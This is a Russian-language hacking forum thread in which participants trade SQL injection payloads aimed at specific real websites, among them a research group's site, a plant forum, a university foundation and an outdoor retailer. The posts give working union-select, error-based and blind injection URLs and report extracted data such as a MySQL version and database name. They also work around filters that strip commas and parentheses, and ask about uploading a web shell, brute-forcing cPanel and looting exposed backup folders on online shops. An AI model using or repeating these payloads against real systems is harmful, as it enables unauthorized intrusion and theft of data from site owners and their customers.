Ваши вопросы по уязвимостям.

Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.

 

Здесь есть SQL-inj?

http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+by+1000+--+

 

_http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=-36'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+

_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+substring(version(),1,1)=5+and+('1'='1

или через ошибку

_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))+and+('1'='1

не смог больше ничего придумать..

 

Класс!

 

привет команде;

http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(database()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

мы получили->4.1.14:extaffairs

http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true

Я не знаю, почему он тут ошибки, это должно быть правдой
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error

 

MagicQuotes on

 

http://www.msufoundation.com/impact/stories/details.php?id=36+and+lower(ascii(substring(database(),1,1)))=101

 

Или же
http://www.msufoundation.com/impact/stories/details.php?id=36+and+substring(database(),1,1)=0x65

 

что можно вытащить полезного (к чему докопаться) если просматриваются папки
/backup/
/includes/
/js/
/scripts/
/temp/
/email/
очень много таких сайтов насобиралось, в основном онлайн шопы.
И еще одно, есть ли возможность взлома либо брута cPanel 11?

 

Привет группы;

Можно ли придать этим сайтом?, потому что у нас нет какой-либо аргумент URL

http://www.kitterytradingpost.com/product.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

 

http://www.kitterytradingpost.com/product.php/prodid/3647
делаешь так
http://www.kitterytradingpost.com/product.php?prodid=-3647 и вот тут дальше копай

 

ребят есть способ заливки шелла через Openads (phpAdsNew) ?

 

тынц
для кого тему прикрепляли? в след раз будет минус.

 

OK , спасибо ))

 

http://www.kitterytradingpost.com/product.php?prodid=3647 order by 29 <-error

Итак, мы имеем 28


http://www.kitterytradingpost.com/product.php?prodid=3647 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- <- The used SELECT statements have a different number of columns

что случилось?

 

у нас есть какое-либо решение атаковать этот сайт?

 

Читай.

 

Там еще вырезаются ( ) так что некоторые методы вывода сразу лесом =(

 

там вырезаются запятые, проблема именно в этом
http://www.kitterytradingpost.com/product.php?prodid=36,,,,47

 

Подскажите команды для работы с sql-inj - mysql 4 ветки.
Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.

А пока вы тут мне подсказываете я на другие форумы полез

P.S с 5 веткой проще работать